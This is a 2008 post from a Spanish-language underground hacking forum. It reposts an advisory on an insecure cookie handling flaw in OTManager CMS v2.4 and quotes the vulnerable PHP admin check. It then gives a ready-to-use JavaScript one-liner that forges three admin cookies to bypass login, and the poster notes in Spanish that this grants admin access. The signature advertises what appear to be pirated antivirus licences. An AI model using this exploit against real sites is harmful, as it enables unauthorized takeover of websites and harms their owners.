Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 30, 2008, 02:31:44
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: OTManager CMS v2.4 Insecure Cookie Handling Vulnerability 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: OTManager CMS v2.4 Insecure Cookie Handling Vulnerability  (Leído 22 veces)
e0f-R00t. [ Vacaciones ]
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2429


EndOfFile................. CodeBuser..............


Ver Perfil
« en: Agosto 03, 2008, 05:20:23 »

Código:
  ###################################################################################
  #                                                                                 #
  #      ...:::::OTManager CMS v2.4 Insecure Cookie Handling Vulnerability ::::.... #           
  ###################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:
OTManager CMS, suffers from insecure cookie handling, when a admin login is successfull the script creates
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
logged in as a legit admin.
---
vuln code in /Admin/index.php:

if ($_COOKIE['ADMIN_Hora'] != '' and $_COOKIE['ADMIN_Logado'] == 'SIM' and $_COOKIE['ADMIN_Nome'] != ''){
header('Location: ADM_Pagina.php'); // redirect to admin area

---
exploit:
javascript:document.cookie = "ADMIN_Hora=1; path=/"; document.cookie = "ADMIN_Logado=SIM; path=/"; document.cookie = "ADMIN_Nome=1; path=/";
-----
now visit /Admin and  you can get admin access and manage the cms ;)
-------
young iranian h4ck3rz

Entras como admin al utilizar este exploit y
te pone las cookies de admin


saludos
En línea


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
NORMAS DEL FORO





Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Acunetix Web Vulnerability
|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
NOD32 ESET Smart Security 3.0.650 Full
|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
KIS6 & KIS7 [ de por vida ]


Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Tutorial Remote File Inclusion ( RFI )
|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
Evitando SQL Injection

La imaginacion es lo mas poderoso que ha conocido el ser humano
TerminalHacker.net
LatinoHack.com
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: OTManager CMS v2.4 Insecure Cookie Handling Vulnerability « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC